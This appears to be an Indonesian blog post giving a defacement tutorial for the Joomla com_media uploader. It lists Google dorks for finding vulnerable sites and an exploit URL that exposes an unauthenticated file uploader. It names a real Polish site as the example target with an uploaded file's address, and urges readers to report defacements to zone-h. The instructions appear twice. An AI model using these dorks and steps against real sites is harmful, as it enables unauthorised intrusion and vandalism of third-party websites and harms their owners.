Pertama, Masukan Dorknya Di Google:
inurl:com_media "intitle:"Insert Files" site:
inurl:com_media "intitle:wstaw"
inurl:com_media"intitle:Afbeelding invoegen"
kalo bisa dork tersebut dikembangkan lagi yah,
biar bisa nemu target yang fresh :)
Siapkan Target dan Exploit: /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Sebelum Exploit :
http://plan2.straz.olsztyn.pl/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
Sesudah Exploit
http://plan2.straz.olsztyn.pl/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Selanjutnya sobat tinggal upload file yang sobat inginkan di bagian uploader..
Note: file yang bisa diupload berextensi .txt .jpg .gif .png. Untuk html dan php tidak bisa.
kalo berhasil, akan muncul keterangan seperti berikut:
Nah, untuk melihat hasil file yang sudah kita upload di sini: site.com/images/file
Contoh : http://plan2.straz.olsztyn.pl/images/X.txt
Lihat Hasil File Yang Sudah Saya Upload Tadi :) Tinggal Submit Aja di http://www.zone-h.org :p
Jangan Lupa Nitip Nick CrazyOlic404
inurl:com_media "intitle:"Insert Files" site:
inurl:com_media "intitle:wstaw"
inurl:com_media"intitle:Afbeelding invoegen"
kalo bisa dork tersebut dikembangkan lagi yah,
biar bisa nemu target yang fresh :)
Siapkan Target dan Exploit: /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Sebelum Exploit :
http://plan2.straz.olsztyn.pl/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
Sesudah Exploit
http://plan2.straz.olsztyn.pl/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Selanjutnya sobat tinggal upload file yang sobat inginkan di bagian uploader..
Note: file yang bisa diupload berextensi .txt .jpg .gif .png. Untuk html dan php tidak bisa.
kalo berhasil, akan muncul keterangan seperti berikut:
Nah, untuk melihat hasil file yang sudah kita upload di sini: site.com/images/file
Contoh : http://plan2.straz.olsztyn.pl/images/X.txt
Lihat Hasil File Yang Sudah Saya Upload Tadi :) Tinggal Submit Aja di http://www.zone-h.org :p
Jangan Lupa Nitip Nick CrazyOlic404
0 komentar:
Posting Komentar